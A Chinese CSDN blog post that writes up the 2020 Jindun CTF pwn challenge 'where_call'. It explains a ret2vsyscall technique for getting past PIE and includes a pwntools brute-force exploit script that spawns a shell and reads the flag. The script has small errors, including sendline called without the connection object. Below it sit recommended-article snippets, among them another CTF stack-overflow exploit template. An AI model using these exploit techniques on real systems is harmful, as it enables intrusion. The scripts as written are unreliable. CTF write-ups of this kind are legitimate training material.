2020 金盾 pwn where_call

最新推荐文章于 2021-03-05 14:56:08 发布
最新推荐文章于 2021-03-05 14:56:08 发布
阅读量471 收藏 1
点赞数 1
CC 4.0 BY-SA版权
分类专栏: CTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/yongbaoii/article/details/111944352

总的来说是ret2vdso

在这里插入图片描述保护全开。

在这里插入图片描述

就如程序名,where_call,程序让你输入一个函数地址,结合下面的v5等于121,那么想的是找到一个函数,对v5进行一些操作,让它等于121,但是程序开了PIE,难点就在这里。

我们说平常PIE的绕过有两种方法,一种是泄露内存地址,但是那需要一些类似于read函数的东西,但是现在啥没有。另外一种就是partial write,但你看这显然不行,你去哪write?

所以就想到ret2vdso,或者说ret2vsyscall。

vsyscall是固定的,里面第二个函数是time函数,传入一个参数,调用time函数,返回一个时间值到buf,即相对于UTC(1970-01-01 00:00:00 +0000)所经过的秒数。当buf恰好等于121时即可进入后门函数调用system(“/bin/sh”)。

虽然说我们得到的时间是相对UTC的,但是它判断的时候值判断最后一个字节

在这里插入图片描述
所以还是可以爆破出来的。

然后就接爆破。

exp

from pwn import*
while True:
    try:
        r = process('./where_call')
        r.recvuntil("What is your call??\n")
        vsys = 0xffffffffff600400
        sendline(p64(vsys))
        #sendline("ls")
        sendline("cat flag")
        s = r.recv()
        '''
        if "where_call" in s:
            print s
        break
        '''
        if 'flag' in s:
        	print s
        break 
    except:
        r.close()
        continue
Python编程中的Alias库
2301_79326510的博客
09-24 619
Python是一种功能强大的编程语言,具有丰富的标准库和第三方库,可以帮助开发人员更高效地编写代码。在Python中,Alias库是一个常用的库,它提供了一些功能,可以方便地创建和管理变量的别名。Alias库是一个方便的Python库,可以帮助我们创建、修改和删除变量的别名。通过使用Alias库,我们可以更灵活地操作变量,并且可以在代码中更好地表达我们的意图。希望本文提供的示例代码能够帮助你理解Alias库的使用方法,并在实际开发中发挥作用。如果我们想要删除一个变量的别名,可以使用Alias库提供的。
python 执行alias_alias命令的使用
weixin_39826089的博客
12-18 2926
alias, 假名,别名,bash的一个内建命令,用来给常用的较长的命令定义个简短的名称。alias命令的基本格式为alias [word[='command']], []内为可选项。定义word为command的别名。若=’command’部分省略,则输出word之前的定义,未定义则报错。单独的alias列出当前环境中所有可用的别名。通常来讲,关于alias,知道这么多就行了。#alias#...
小用lambda函数
weixin_48445640的博客
09-26 577
当函数只有一句代码,并且含有一个返回值时可以利用lambda函数 print((lambda a, b = 1: a + b)(1, 2)) 此时输出为3 a和b相当于python函数里的参数
Javascript的匿名函数
lzhdim的专栏
03-30 275
从下文中你可以知道JS的多种写法,当然有些写法不清晰,但比较适合JS框架设计开发用。
 
 
 
 一、什么是匿名函数?
 在Javascript定义一个函数一般有如下三种方式:
 
 函数关键字(function)语句:
 function fnMethodName(x){alert(x);}&#13...
JS匿名函数理解
aiqi458587的专栏
02-04 240
匿名函数的基本形式为(function(){...})(); 前面的括号包含函数体,后面的括号就是给匿名函数传递参数并立即执行之 匿名函数的作用是避免全局变量的污染以及函数名的冲突 1.小括号的作用 小括号能把我们的表达式组合分块,并且每一块,也就是每一对小括号,都有一个返回值。这个返回值实际上也就是小括号中表达式的返回值。所以,当我们用一对小括号把匿名函数括起来的时候,实...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
PWN.zip_PWN控制舵机_pwn控制_pwn控制h桥_数字舵机_电机
07-14
pwm波输出,实现数字舵机的控制,完成一些简单的电机控制问题
pwn_debug:旨在帮助快速构建对CTF Pwn游戏的利用
05-14
pwn_debug pwn_debug-基于pwntools的ctf pwns的辅助调试工具 建议您在获得“用法和安装”的完整说明。 这只是一个简单的描述。 入门 安装pwn_debug git clone https://github.com/ray-cp/pwn_debug.git cd pwn_...
PWM.zip_PWM脉冲发生器_pwn proteus_单片机 pwn_脉冲 仿真_脉冲发生器PWM
09-24
PWM,即脉宽调制(Pulse Width Modulation),是一种广泛应用的数字控制技术,主要用于调节电子设备的功率或模拟信号。在单片机系统中,PWM脉冲发生器是核心部件,它通过改变脉冲宽度来调整输出信号的平均电压,从而...
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 1112
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
js匿名函数的作用
zhuoyunpeng的博客
09-11 923
作用域:变量的作用范围 根据作用域不同: 全局变量: 在整个文档中都能被访问 在函数外声明的变量 在函数中声明变量时没有使用var 局部变量: 在函数内声明的变量(包含参数位置) 在ES5中没有块级作用域 总结: 建议:优先使用局部变量(因为全局变量生命周期更长(和页面生命周期一致),占用内存时间更长,局部变量使用完毕就可以等待回收,更加合理) ...
python中1%7是多多少_再传捷报!原子同学优秀学员Python成绩位列全国前1%!
weixin_36384501的博客
12-24 659
原标题:再传捷报!原子同学优秀学员Python成绩位列全国前1%! #科创板块成为素质教育崛起的突破口长期以来,在应试教育为主导的中国教育体制下,素质教育一直是比较矛盾的存在。从教育本质上看,二者并不对立,但由于成绩、升学率等硬性指标的“挤压”,学校、家长和学生很少把大量时间用在素质教育上。随着近几年少儿编程&机器人教育在国内的快速兴起,素质教育的崛起似乎在科创素养这一板块找到突破口。 为...
第一类对象(First-class Object)
weixin_33907511的博客
04-14 724
2019独角兽企业重金招聘Python工程师标准>>> ...
JavaScript中匿名函数的作用和用法
Dontla的博客
03-05 2504
匿名函数可bai以有效的保证在页面上写入Javascript,而不会造成全局变量的污染。 这在给一个不是很熟悉的页面增加Javascript时非常有效,也很优美。 例: <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Title</title> <script> var b=10;
js的函数和匿名函数和作用域
XUELUO123456789的博客
03-19 1113
一.匿名函数 概念:没有名字的函数 匿名函数的自调用:第一种(function(){ ... })(); 第二种(function(){ ... }...
【Unix/Linux.Shell Script】函数
王晓斌的专栏
09-21 1057
在shell中还可以定义函数。函数实际上也是由若干条shell命令组成的。因此它与shell程序形式上相似的, 函数定义 函数定义的基本格式为: [function] 函数名() #函数名前的function可以省略 { 若干个命令行 } 所有函数在使用前必须定义,这意味着必须将函数放在脚本开始部分。或者将它们放在另一个独立文件中且以点号 . 命令来取用它们。 函
第一个Unix Shell函数
产品经理,程序人生
02-01 1503
凡事都有个开头;有句话说,万事开头难;不管以后的路怎么样,走好脚下的每一步。 今天接触到了Unix shell中的函数,记录下,写了个hello函数,如下: pg fun_hello.sh #!/bin/ksh hello () { echo "Hello ,this is my first Shell function!" echo "Today is `date +%Y-%m-%
如何正确理解Python函数是第一类对象(First-Class Object)
Python之禅的专栏
04-12 583
之前写过一篇关于函数(Function)作为程序语言中不可或缺的一部分,太稀松平常了。但函数作为第一类对象(First-Class Object)却是 Python 函...
js匿名函数的理解
小男孩tom的博客
09-19 293
摘要: 定义函数的方式有两种,一种是函数声明,一种是函数表达式(匿名函数)。 函数声明: function abc(x,y){ return x+y; } JavaScript无论你怎么去定义你的函数,JS解释器都会把它翻译成一个Function对象。 alert(typeof abc);// “function” Function 对象是JavaScript里面的固有对象,...
pwn2_sctf_2016
最新发布
02-16
### 关于 SCTF 2016 中 pwn2 题目的解析 在 SCTF (Security Capture The Flag) 2016 的比赛中,`pwn2` 是一道涉及栈溢出漏洞利用的题目[^1]。此题允许参赛者通过特定输入来覆盖返回地址并控制程序执行流程。 #### 漏洞环境描述 该挑战提供了一个存在缓冲区溢出缺陷的应用程序实例。应用程序接收用户输入作为处理对象,在缺乏适当边界检查的情况下将其复制到固定大小的内存区域中。这种设计使得攻击者能够精心构造恶意数据包以破坏堆栈结构,并最终实现任意代码执行的目的。 #### 解决方案概述 为了成功完成这一任务,参与者通常采取以下策略: - **确定偏移量**:首先需要找到合适的字节填充数量以便精确地覆盖目标位置而不影响其他重要部分的数据完整性。 - **泄露 SSP 地址**:由于开启了 Stack Smashing Protector(SSP),即栈保护机制,因此还需要想办法获取其实际值用于后续操作中的调整校验计算。 - **定位 libc 基础地址**:如果远程服务器上使用的 glibc 版本未知,则可能需借助某些方法推测或直接读取相关指针从而得知确切基址。 - **构建有效载荷**:最后一步就是组合上述信息形成完整的 exploit chain ,比如采用 ret2libc 技巧调用 system 函数启动 shell 或者跳转至已知 gadgets 实现相同效果。 ```python from pwn import * context(log_level="debug") flag_addr = 0x600DC0 for attempt in range(1, 101): try: conn = remote('example.com', port_number) padding = b'a' * offset_to_return_address # 计算得出的确切偏移量 payload = ( padding + pack(flag_addr, 64) + ... # 可能还包括其他的 ROP chains 组件 ) conn.recvuntil(prompt_string) conn.sendline(payload) response = conn.recvall(timeout=timeout_seconds).decode() print(f"[Attempt {attempt}] Received: ", response.strip()) if success_pattern in response.lower(): break except Exception as e: log.error(e) finally: conn.close() if not 'success pattern found': raise ValueError("Failed after multiple attempts.") ``` 这段 Python 脚本展示了如何自动化尝试连接服务端发送特制请求的过程。注意这里 `offset_to_return_address`, `prompt_string`, 和 `port_number` 等变量都需要根据实际情况设定具体的数值;而 `pack()` 方法用来创建适合架构位宽的机器码表示形式。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值